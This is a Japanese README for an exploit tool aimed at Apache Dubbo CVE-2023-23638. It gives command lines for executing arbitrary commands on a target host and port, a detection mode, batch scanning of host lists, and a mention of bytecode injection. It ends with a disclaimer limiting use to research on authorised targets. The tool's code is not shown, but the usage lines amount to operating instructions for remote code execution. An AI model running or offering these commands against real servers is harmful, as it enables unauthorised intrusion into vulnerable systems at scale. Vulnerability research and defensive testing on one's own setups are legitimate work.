
Apache Dubbo (CVE-2023-23638) 脆弱性悪用の工学的実践
Apache Dubbo (CVE-2023-23638) 脆弱性悪用の工学的実践であり、Dubbo 3.x のサービスディスカバリから脆弱性悪用およびエコーバックまでのプロセスをカバーしています。このツールは研究および学習目的のみで提供されており、各位の専門家からの議論や貴重な提案をお待ちしております。
本ツールはCVE-2023-23638のDubbo 3.xにおける完全な悪用をサポートし、サービスディスカバリから脆弱性悪用およびエコーバックまでをカバーします。Dubbo 2.xバージョンでも悪用可能ですが、サービス名、メソッド名などを自分で指定する必要があります。この脆弱性に関して、私は2つの分析記事を執筆しました:
本ツールは学習目的のみであり、実戦における多くの問題(例:カスタムサービス名・メソッド名の利用、バイトコードのJavaコンパイルバージョン問題)は考慮していません。
今後も更新予定
このプロジェクトは今後更新されません。Dubboに関するより包括的なスキャンと悪用は、後日別のプロジェクトでオープンソース化される予定です。お楽しみに!
y4tacker氏が共有してくれたfastjsonネイティブデシリアライゼーションのアイデアに感謝します。
単一URLの脆弱性悪用
java -jar CVE-2023-23638.jar TARGET_IP TARGET_PORT COMMAND CHARSET(default UTF-8)
e.g.:
java -jar CVE-2023-23638.jar 127.0.0.1 20880 whoami
単一URLの脆弱性無害検出
java -jar CVE-2023-23638.jar -s TARGET_IP TARGET_PORT
e.g.:
java -jar CVE-2023-23638.jar -s 127.0.0.1 20880
バッチ検出
1.txt:
127.0.0.1:20880
192.168.1.1:20880
java -jar CVE-2023-23638.jar -f FILE_PATH
e.g.:
java -jar CVE-2023-23638.jar -f 1.txt
バイトコード注入

コマンド実行

本ツールは脆弱性の研究および学習のみを目的としています。本ツールの可用性をテストする必要がある場合は、ご自身でターゲット環境を構築してください。 本ツールを使用して検出を行う場合、その行為が現地の法令に準拠し、適切な許可を得ていることを確認してください。許可されていないターゲットに対してスキャンを行わないでください。 本ツールの使用中に何らかの違法行為があった場合、利用者はその結果に対して自ら責任を負うものとし、当方は一切の法的責任および関連責任を負いません。